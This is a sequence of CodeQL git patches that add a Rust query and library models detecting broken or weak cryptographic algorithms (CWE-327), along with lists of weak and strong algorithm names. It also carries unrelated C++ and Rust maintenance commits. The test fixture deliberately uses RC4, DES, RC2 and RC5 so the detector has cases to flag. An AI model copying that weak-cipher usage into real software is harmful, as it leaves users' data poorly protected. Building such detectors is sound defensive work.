@@ -0,0 +1,84 @@ +/** + * Names of cryptographic algorithms, separated into strong and weak variants. + * + * The names are normalized: upper-case, no spaces, dashes or underscores. + * + * The names are inspired by the names used in real world crypto libraries. + * + * The classification into strong and weak are based on Wikipedia, OWASP and Google (2021). + */ + +/** + * Holds if `name` corresponds to a strong hashing algorithm. + */ +predicate isStrongHashingAlgorithm(string name) { + name = + [ + // see https://cryptography.io/en/latest/hazmat/primitives/cryptographic-hashes/#blake2 + // and https://www.blake2.net/ + "BLAKE2", "BLAKE2B", "BLAKE2S", + // see https://github.com/BLAKE3-team/BLAKE3 + "BLAKE3", + // + "DSA", "ED25519", "ES256", "ECDSA256", "ES384", "ECDSA384", "ES512", "ECDSA512", "SHA2", + "SHA224", "SHA256", "SHA384", "SHA512", "SHA3", "SHA3224", "SHA3256", "SHA3384", "SHA3512", + // see https://cryptography.io/en/latest/hazmat/primitives/cryptographic-hashes/#cryptography.hazmat.primitives.hashes.SHAKE128 + "SHAKE128", "SHAKE256", + // see https://cryptography.io/en/latest/hazmat/primitives/cryptographic-hashes/#sm3 + "SM3", + // see https://security.stackexchange.com/a/216297 + "WHIRLPOOL", + ] +} + +/** + * Holds if `name` corresponds to a weak hashing algorithm. + */ +predicate isWeakHashingAlgorithm(string name) { + name = + [ + "HAVEL128", "MD2", "MD4", "MD5", "PANAMA", "RIPEMD", "RIPEMD128", "RIPEMD256", "RIPEMD160", + "RIPEMD320", "SHA0", "SHA1" + ] +} + +/** + * Holds if `name` corresponds to a strong encryption algorithm. + */ +predicate isStrongEncryptionAlgorithm(string name) { + name = + [ + "AES", "AES128", "AES192", "AES256", "AES512", "AES-128", "AES-192", "AES-256", "AES-512", + "ARIA", "BLOWFISH", "BF", "ECIES", "CAST", "CAST5", "CAMELLIA", "CAMELLIA128", "CAMELLIA192", + "CAMELLIA256", "CAMELLIA-128", "CAMELLIA-192", "CAMELLIA-256", "CHACHA", "GOST", "GOST89", + "IDEA", "RABBIT", "RSA", "SEED", "SM4" + ] +} + +/** + * Holds if `name` corresponds to a weak encryption algorithm. + */ +predicate isWeakEncryptionAlgorithm(string name) { + name = + [ + "DES", "3DES", "DES3", "TRIPLEDES", "DESX", "TDEA", "TRIPLEDEA", "ARC2", "RC2", "ARC4", "RC4", + "ARCFOUR", "ARC5", "RC5" + ] +} + +/** + * Holds if `name` corresponds to a strong password hashing algorithm. + */ +predicate isStrongPasswordHashingAlgorithm(string name) { + name = ["ARGON2", "PBKDF2", "BCRYPT", "SCRYPT"] +} + +/** + * Holds if `name` corresponds to a weak password hashing algorithm. + */ +predicate isWeakPasswordHashingAlgorithm(string name) { name = "EVPKDF" } + +/** + * Holds if `name` corresponds to a stream cipher. + */ +predicate isStreamCipher(string name) { name = ["CHACHA", "RC4", "ARC4", "ARCFOUR", "RABBIT"] } From eeeb142f0b227682c47ded382d7e7392690cbbd5 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Wed, 4 Dec 2024 14:49:25 +0000 Subject: [PATCH 0843/1267] Rust: Implement the query. --- rust/ql/lib/codeql/rust/Concepts.qll | 29 +++++++++++++++++++ .../security/CWE-327/BrokenCryptoAlgorithm.ql | 14 +++++++-- 2 files changed, 40 insertions(+), 3 deletions(-) diff --git a/rust/ql/lib/codeql/rust/Concepts.qll b/rust/ql/lib/codeql/rust/Concepts.qll index 7e3ec0990ce..070b8a118cc 100644 --- a/rust/ql/lib/codeql/rust/Concepts.qll +++ b/rust/ql/lib/codeql/rust/Concepts.qll @@ -172,3 +172,32 @@ module SqlSanitization { */ abstract class Range extends DataFlow::Node { } } + +/** + * Provides models for cryptographic things. + */ +module Cryptography { + private import codeql.rust.internal.ConceptsShared::Cryptography as SC + + /** + * A data-flow node that is an application of a cryptographic algorithm. For example, + * encryption, decryption, signature-validation. + * + * Extend this class to refine existing API models. If you want to model new APIs, + * extend `CryptographicOperation::Range` instead. + */ + class CryptographicOperation extends SC::CryptographicOperation instanceof CryptographicOperation::Range + { } + + class EncryptionAlgorithm = SC::EncryptionAlgorithm; + + class HashingAlgorithm = SC::HashingAlgorithm; + + class PasswordHashingAlgorithm = SC::PasswordHashingAlgorithm; + + module CryptographicOperation = SC::CryptographicOperation; + + class BlockMode = SC::BlockMode; + + class CryptographicAlgorithm = SC::CryptographicAlgorithm; +} diff --git a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql index 3890d54c03b..3d777b08539 100644 --- a/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql +++ b/rust/ql/src/queries/security/CWE-327/BrokenCryptoAlgorithm.ql @@ -11,7 +11,15 @@ */ import rust +import codeql.rust.Concepts -from int i -where none() -select i +from Cryptography::CryptographicOperation operation, string msgPrefix +where + exists(Cryptography::EncryptionAlgorithm algorithm | algorithm = operation.getAlgorithm() | + algorithm.isWeak() and + msgPrefix = "The cryptographic algorithm " + algorithm.getName() + ) + or + operation.getBlockMode().isWeak() and msgPrefix = "The block mode " + operation.getBlockMode() +select operation, "$@ is broken or weak, and should not be used.", operation.getInitialization(), + msgPrefix From 12b4c0a2dd26dfdf487026ca941b68b6005e4760 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Thu, 5 Dec 2024 15:40:50 +0000 Subject: [PATCH 0844/1267] C++: Change note --- cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md diff --git a/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md b/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md new file mode 100644 index 00000000000..df9e13c0704 --- /dev/null +++ b/cpp/ql/src/change-notes/2024-12-05-wrong-type-format-args.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* The "Wrong type of arguments to formatting function" query (`cpp/wrong-type-format-argument`) query no longer produces results when a string type has an extraction error. From ca6d3b003874d6da9d1a726acfe5bbecdd23140f Mon Sep 17 00:00:00 2001 From: Ben Rodes Date: Thu, 5 Dec 2024 10:48:00 -0500 Subject: [PATCH 0845/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 6d74ccf30ff..bf34ce919ce 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -9,7 +9,7 @@ private newtype TEdgeKind = TTrueEdge() or // 'true' edge of conditional branch TFalseEdge() or // 'false' edge of conditional branch TCppExceptionEdge() or // Thrown C++ exception - TSehExceptionEdge() or // Thrown C++ exception + TSehExceptionEdge() or // Thrown SEH exception TDefaultEdge() or // 'default' label of switch TCaseEdge(string minValue, string maxValue) { // Case label of switch From 008d58b425e843d0f307537285e357daa710f05c Mon Sep 17 00:00:00 2001 From: Ben Rodes Date: Thu, 5 Dec 2024 10:48:16 -0500 Subject: [PATCH 0846/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index bf34ce919ce..c442d0e6f57 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -67,7 +67,7 @@ final class ExceptionEdge = ExceptionEdgeImpl; /** * An "exception" edge, representing the successor of an instruction when that - * instruction's evaluation throws an exception for C++ exceptions + * instruction's evaluation throws a C++ exception. */ class CppExceptionEdge extends ExceptionEdgeImpl, TCppExceptionEdge { final override string toString() { result = "C++ Exception" } From e9ccf37d4d66120b3663ae439f5bfc6bcaa23c39 Mon Sep 17 00:00:00 2001 From: Ben Rodes Date: Thu, 5 Dec 2024 10:48:23 -0500 Subject: [PATCH 0847/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index c442d0e6f57..8c539626f07 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -75,7 +75,7 @@ class CppExceptionEdge extends ExceptionEdgeImpl, TCppExceptionEdge { /** * An "exception" edge, representing the successor of an instruction when that - * instruction's evaluation throws an exception for SEH exceptions + * instruction's evaluation throws an SEH exception. */ class SehExceptionEdge extends ExceptionEdgeImpl, TSehExceptionEdge { final override string toString() { result = "SEH Exception" } From 1fbd75fee3025f06285ff629536ec41fb48b2a38 Mon Sep 17 00:00:00 2001 From: Ben Rodes Date: Thu, 5 Dec 2024 10:48:34 -0500 Subject: [PATCH 0848/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 8c539626f07..4cbff4e5d32 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -145,7 +145,7 @@ module EdgeKind { FalseEdge falseEdge() { result = TFalseEdge() } /** - * Gets an instance of the `CppExceptionEdge` class. + * Gets the single instance of the `CppExceptionEdge` class. */ CppExceptionEdge cppExceptionEdge() { result = TCppExceptionEdge() } From 6cbaa73d5802e03d8080f2c44d5bc66387e1fe89 Mon Sep 17 00:00:00 2001 From: Ben Rodes Date: Thu, 5 Dec 2024 10:48:40 -0500 Subject: [PATCH 0849/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 4cbff4e5d32..487ada46059 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -150,7 +150,7 @@ module EdgeKind { CppExceptionEdge cppExceptionEdge() { result = TCppExceptionEdge() } /** - * Gets an instance of the `SehExceptionEdge` class. + * Gets the single instance of the `SehExceptionEdge` class. */ SehExceptionEdge sehExceptionEdge() { result = TSehExceptionEdge() } From 3115833847237130fab1c0ef38ffe2cbe505ba39 Mon Sep 17 00:00:00 2001 From: Ben Rodes Date: Thu, 5 Dec 2024 10:49:33 -0500 Subject: [PATCH 0850/1267] Update cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll Co-authored-by: Jeroen Ketema <93738568+jketema@users.noreply.github.com> --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 487ada46059..3a8ae40694c 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -58,10 +58,8 @@ abstract private class ExceptionEdgeImpl extends EdgeKindImpl { } * An "exception" edge, representing the successor of an instruction when that * instruction's evaluation throws an exception. * - * Exception edges are expclitly sublcassed to - * `CppExceptionEdge` and `SehExceptionEdge` only. - * Further sublcasses, if required, should be added privately - * here for IR efficiency. + * Exception edges are expclitly sublcassed to `CppExceptionEdge` and `SehExceptionEdge` + * only. Further sublcasses, if required, should be added privately here for IR efficiency. */ final class ExceptionEdge = ExceptionEdgeImpl; From 48c86979f01efd59e5cad6d0111c1ad25575cdc6 Mon Sep 17 00:00:00 2001 From: "REDMOND\\brodes" Date: Thu, 5 Dec 2024 10:50:06 -0500 Subject: [PATCH 0851/1267] Deleting unused predicate. --- cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll | 8 -------- 1 file changed, 8 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 6d74ccf30ff..e0236a566e5 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -154,14 +154,6 @@ module EdgeKind { */ SehExceptionEdge sehExceptionEdge() { result = TSehExceptionEdge() } - /** - * Gets an instance of the `ExceptionEdge` class. - */ - ExceptionEdge exceptionEdge() { - result = cppExceptionEdge() or - result = sehExceptionEdge() - } - /** * Gets the single instance of the `DefaultEdge` class. */ From 720bfc8ff12cb214d4f584a2c330252ae21b8c83 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 5 Dec 2024 17:43:47 +0100 Subject: [PATCH 0852/1267] Rust: tweak/define more `toString` implementations --- rust/ql/.generated.list | 2 -- rust/ql/.gitattributes | 2 -- .../codeql/rust/elements/internal/MethodCallExprImpl.qll | 8 +++++++- rust/ql/lib/codeql/rust/elements/internal/StructImpl.qll | 6 ++++-- rust/ql/lib/codeql/rust/elements/internal/VariantImpl.qll | 6 ++++-- 5 files changed, 15 insertions(+), 9 deletions(-) diff --git a/rust/ql/.generated.list b/rust/ql/.generated.list index b13b4bc6db9..264205ee914 100644 --- a/rust/ql/.generated.list +++ b/rust/ql/.generated.list @@ -360,7 +360,6 @@ lib/codeql/rust/elements/internal/StmtImpl.qll ea99d261f32592ff368cc3a1960864989 lib/codeql/rust/elements/internal/StmtListConstructor.qll 435d59019e17a6279110a23d3d5dfbc1d1e16fc358a93a1d688484d22a754866 23fcb60a5cbb66174e459bc10bd7c28ed532fd1ab46f10b9f0c8a6291d3e343f lib/codeql/rust/elements/internal/StmtListImpl.qll fc16097d08124bcc39c998b07023710e0152baed165fb134cac2ee27e22a9f7a a4eceb42720593d8d0ce031016465de0bb61d40f31b2cc2718626ef8348ac900 lib/codeql/rust/elements/internal/StructConstructor.qll 52921ea6e70421fd08884dc061d0c2dfbbb8dd83d98f1f3c70572cfe57b2a173 dcb3ea8e45ee875525c645fe5d08e6db9013b86bd351c77df4590d0c1439ab9f -lib/codeql/rust/elements/internal/StructImpl.qll 7e3b58c3038ad7a3315cae34a34f99380e36d33cf3fb4437de6f6dcfed2ad579 1cfcb3bb5381349a2a4074a9e53927f5c540f2b251b187ad28da300968dfc649 lib/codeql/rust/elements/internal/TokenImpl.qll 87629ffee74cacc6e8af5e96e18e62fb0fa4043d3ba1e7360daa880e628f8530 d54e213e39ae2b9bb92ab377dc72d72ba5bca88b72d29032507cdcbef201a215 lib/codeql/rust/elements/internal/TokenTreeConstructor.qll 0be1f838b04ff944560aa477cbe4ab1ad0b3f4ae982de84773faac5902fcae45 254b387adc2e1e3c355651ab958785d0b8babbc0030194234698a1219e9497b3 lib/codeql/rust/elements/internal/TokenTreeImpl.qll c61574f2b551db24640258117e0c8653196ba91392ce81da71a3a528ee07b1ad 489a1c8f550725e28871ae99c41d03b719c3099b8f73ae7422f497430f616267 @@ -403,7 +402,6 @@ lib/codeql/rust/elements/internal/UseTreeImpl.qll 25e286538c048cc7ee07f4b5a8b77b lib/codeql/rust/elements/internal/UseTreeListConstructor.qll 973577da5d7b58eb245f108bd1ae2fecc5645f2795421dedf7687b067a233003 f41e5e3ffcb2a387e5c37f56c0b271e8dc20428b6ff4c63e1ee42fcfa4e67d0a lib/codeql/rust/elements/internal/UseTreeListImpl.qll 6cac5242f1219df0fe9b3c139db8cc075a2fde618614ca56de2c856130a8ebaa d2ec917055a45f4d07d4ea6dff14298925ae323b165a5bcb6e906f7aad463f82 lib/codeql/rust/elements/internal/VariantConstructor.qll 0297d4a9a9b32448d6d6063d308c8d0e7a067d028b9ec97de10a1d659ee2cfdd 6a4bee28b340e97d06b262120fd39ab21717233a5bcc142ba542cb1b456eb952 -lib/codeql/rust/elements/internal/VariantImpl.qll f5204121f15407ffc0926128239f317cbb9277ee456217940c15d48ba80abd49 4de0a8895d9c08f86fa139007ed009a3a5e1101b9edb40c73c58a4059c318802 lib/codeql/rust/elements/internal/VariantListConstructor.qll c841fb345eb46ea3978a0ed7a689f8955efc9178044b140b74d98a6bcd0c926a c9e52d112abdba2b60013fa01a944c8770766bf7368f9878e6b13daaa4eed446 lib/codeql/rust/elements/internal/VariantListImpl.qll 858f3668f53d8b6aacb2715a59509969fe9fd24c5a2ff0b5ceed8a2441cd9cf7 f2a57b6232247687f529be8e4d2d3d0d4d108221d8a6eb45a69a1bcc0cdc51de lib/codeql/rust/elements/internal/VisibilityConstructor.qll 1fd30663d87945f08d15cfaca54f586a658f26b7a98ea45ac73a35d36d4f65d0 6ddaf11742cc8fbbe03af2aa578394041ae077911e62d2fa6c885ae0543ba53a diff --git a/rust/ql/.gitattributes b/rust/ql/.gitattributes index 40a1492be4d..49142cf2701 100644 --- a/rust/ql/.gitattributes +++ b/rust/ql/.gitattributes @@ -362,7 +362,6 @@ /lib/codeql/rust/elements/internal/StmtListConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/StmtListImpl.qll linguist-generated /lib/codeql/rust/elements/internal/StructConstructor.qll linguist-generated -/lib/codeql/rust/elements/internal/StructImpl.qll linguist-generated /lib/codeql/rust/elements/internal/TokenImpl.qll linguist-generated /lib/codeql/rust/elements/internal/TokenTreeConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/TokenTreeImpl.qll linguist-generated @@ -405,7 +404,6 @@ /lib/codeql/rust/elements/internal/UseTreeListConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/UseTreeListImpl.qll linguist-generated /lib/codeql/rust/elements/internal/VariantConstructor.qll linguist-generated -/lib/codeql/rust/elements/internal/VariantImpl.qll linguist-generated /lib/codeql/rust/elements/internal/VariantListConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/VariantListImpl.qll linguist-generated /lib/codeql/rust/elements/internal/VisibilityConstructor.qll linguist-generated diff --git a/rust/ql/lib/codeql/rust/elements/internal/MethodCallExprImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/MethodCallExprImpl.qll index a599feded62..7037f5ebbca 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/MethodCallExprImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/MethodCallExprImpl.qll @@ -20,6 +20,12 @@ module Impl { * ``` */ class MethodCallExpr extends Generated::MethodCallExpr { - override string toString() { result = "... ." + this.getNameRef().toString() + "(...)" } + override string toString() { + exists(string base, string separator | + base = this.getReceiver().toAbbreviatedString() and + (if base = "..." then separator = " ." else separator = ".") and + result = base + separator + this.getNameRef().toString() + "(...)" + ) + } } } diff --git a/rust/ql/lib/codeql/rust/elements/internal/StructImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/StructImpl.qll index ddd1189658d..eca3bfb72fa 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/StructImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/StructImpl.qll @@ -1,4 +1,3 @@ -// generated by codegen, remove this comment if you wish to edit this file /** * This module provides a hand-modifiable wrapper around the generated class `Struct`. * @@ -12,11 +11,14 @@ private import codeql.rust.elements.internal.generated.Struct * be referenced directly. */ module Impl { + // the following QLdoc is generated: if you need to edit it, do it in the schema file /** * A Struct. For example: * ```rust * todo!() * ``` */ - class Struct extends Generated::Struct { } + class Struct extends Generated::Struct { + override string toString() { result = "struct " + this.getName().getText() } + } } diff --git a/rust/ql/lib/codeql/rust/elements/internal/VariantImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/VariantImpl.qll index e58f32e0149..b4f1f326af0 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/VariantImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/VariantImpl.qll @@ -1,4 +1,3 @@ -// generated by codegen, remove this comment if you wish to edit this file /** * This module provides a hand-modifiable wrapper around the generated class `Variant`. * @@ -12,11 +11,14 @@ private import codeql.rust.elements.internal.generated.Variant * be referenced directly. */ module Impl { + // the following QLdoc is generated: if you need to edit it, do it in the schema file /** * A Variant. For example: * ```rust * todo!() * ``` */ - class Variant extends Generated::Variant { } + class Variant extends Generated::Variant { + override string toString() { result = this.getName().getText() } + } } From 94dbad7c95cf532dce9eb6a645ec9b7dee7f81e9 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 5 Dec 2024 12:32:25 +0000 Subject: [PATCH 0853/1267] Rust: Model for cipher traits. --- rust/ql/lib/codeql/rust/Frameworks.qll | 1 + .../lib/codeql/rust/frameworks/RustCrypto.qll | 35 +++++++++++++++++++ .../CWE-327/BrokenCryptoAlgorithm.expected | 13 +++++++ .../security/CWE-327/test_cipher.rs | 26 +++++++------- 4 files changed, 62 insertions(+), 13 deletions(-) create mode 100644 rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll diff --git a/rust/ql/lib/codeql/rust/Frameworks.qll b/rust/ql/lib/codeql/rust/Frameworks.qll index 0c6fc573d0f..483056888ec 100644 --- a/rust/ql/lib/codeql/rust/Frameworks.qll +++ b/rust/ql/lib/codeql/rust/Frameworks.qll @@ -3,5 +3,6 @@ */ private import codeql.rust.frameworks.Reqwest +private import codeql.rust.frameworks.RustCrypto private import codeql.rust.frameworks.stdlib.Env private import codeql.rust.frameworks.Sqlx diff --git a/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll new file mode 100644 index 00000000000..295ce8d9e63 --- /dev/null +++ b/rust/ql/lib/codeql/rust/frameworks/RustCrypto.qll @@ -0,0 +1,35 @@ +/** + * Provides modeling for the `RustCrypto` family of crates (`cipher`, `digest` etc). + */ + +private import rust +private import codeql.rust.Concepts +private import codeql.rust.dataflow.DataFlow + +/** + * An operation that initializes a cipher through the `cipher::KeyInit` or + * `cipher::KeyIvInit` trait, for example `Des::new` or `cbc::Encryptor::new`. + */ +class StreamCipherInit extends Cryptography::CryptographicOperation::Range, DataFlow::Node { + string algorithmName; + + StreamCipherInit() { + // a call to `cipher::KeyInit::new`, `cipher::KeyInit::new_from_slice`, + // `cipher::KeyIvInit::new` or `cipher::KeyIvInit::new_from_slices`. + exists(Path p | + this.asExpr().getExpr().(CallExpr).getFunction().(PathExpr).getPath() = p and + p.getResolvedCrateOrigin().matches("%/RustCrypto%") and + p.getPart().getNameRef().getText() = + ["new", "new_from_slice", "new_from_slices"] and + algorithmName = p.getQualifier().getPart().getNameRef().getText() + ) + } + + override DataFlow::Node getInitialization() { result = this } + + override Cryptography::CryptographicAlgorithm getAlgorithm() { result.matchesName(algorithmName) } + + override DataFlow::Node getAnInput() { none() } + + override Cryptography::BlockMode getBlockMode() { result = "" } +} diff --git a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected index e69de29bb2d..69f0fed8534 100644 --- a/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected +++ b/rust/ql/test/query-tests/security/CWE-327/BrokenCryptoAlgorithm.expected @@ -0,0 +1,13 @@ +| test_cipher.rs:20:27:20:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:20:27:20:48 | ...::new(...) | The cryptographic algorithm RC4 | +| test_cipher.rs:23:27:23:60 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:23:27:23:60 | ...::new_from_slice(...) | The cryptographic algorithm RC4 | +| test_cipher.rs:26:27:26:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:26:27:26:48 | ...::new(...) | The cryptographic algorithm RC4 | +| test_cipher.rs:29:27:29:48 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:29:27:29:48 | ...::new(...) | The cryptographic algorithm RC4 | +| test_cipher.rs:59:23:59:42 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:59:23:59:42 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:63:23:63:47 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:63:23:63:47 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:67:23:67:46 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:67:23:67:46 | ...::new_from_slice(...) | The cryptographic algorithm DES | +| test_cipher.rs:71:23:71:42 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:71:23:71:42 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:75:27:75:46 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:75:27:75:46 | ...::new(...) | The cryptographic algorithm DES | +| test_cipher.rs:97:23:97:42 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:97:23:97:42 | ...::new(...) | The cryptographic algorithm RC2 | +| test_cipher.rs:101:23:101:46 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:101:23:101:46 | ...::new_from_slice(...) | The cryptographic algorithm RC2 | +| test_cipher.rs:110:23:110:50 | ...::new(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:110:23:110:50 | ...::new(...) | The cryptographic algorithm RC5 | +| test_cipher.rs:114:23:114:55 | ...::new_from_slice(...) | $@ is broken or weak, and should not be used. | test_cipher.rs:114:23:114:55 | ...::new_from_slice(...) | The cryptographic algorithm RC5 | diff --git a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs index a0230881044..bcb78b32db4 100644 --- a/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs +++ b/rust/ql/test/query-tests/security/CWE-327/test_cipher.rs @@ -17,16 +17,16 @@ fn test_stream_cipher( // rc4 (broken) let rc4_key = rc4::Key::::from_slice(key128); - let mut rc4_cipher1 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let mut rc4_cipher1 = Rc4::<_>::new(rc4_key); // $ Alert[rust/weak-cryptographic-algorithm] rc4_cipher1.apply_keystream(&mut data); - let mut rc4_cipher2 = Rc4::::new_from_slice(key128).unwrap(); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let mut rc4_cipher2 = Rc4::::new_from_slice(key128).unwrap(); // $ Alert[rust/weak-cryptographic-algorithm] rc4_cipher2.apply_keystream(&mut data); - let mut rc4_cipher3 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let mut rc4_cipher3 = Rc4::<_>::new(rc4_key); // $ Alert[rust/weak-cryptographic-algorithm] let _ = rc4_cipher3.try_apply_keystream(&mut data); - let mut rc4_cipher4 = Rc4::<_>::new(rc4_key); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let mut rc4_cipher4 = Rc4::<_>::new(rc4_key); // $ Alert[rust/weak-cryptographic-algorithm] let _ = rc4_cipher4.apply_keystream_b2b(plaintext.as_bytes(), &mut data); // rabbit @@ -56,23 +56,23 @@ fn test_block_cipher( aes_cipher3.decrypt_block(block128.into()); // des (broken) - let des_cipher1 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher1 = Des::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] des_cipher1.encrypt_block(data.into()); des_cipher1.decrypt_block(data.into()); - let des_cipher2 = des::Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher2 = des::Des::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] des_cipher2.encrypt_block(data.into()); des_cipher2.decrypt_block(data.into()); - let des_cipher3 = Des::new_from_slice(key).expect("fail"); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher3 = Des::new_from_slice(key).expect("fail"); // $ Alert[rust/weak-cryptographic-algorithm] des_cipher3.encrypt_block(data.into()); des_cipher3.decrypt_block(data.into()); - let des_cipher4 = Des::new(key.into()); // $ MISSING: Alert[rust/weak-cryptographic-algorithm] + let des_cipher4 = Des::new(key.into()); // $ Alert[rust/weak-cryptographic-algorithm] des_cipher4.encrypt_block_b2b(input.into(), data.into()); 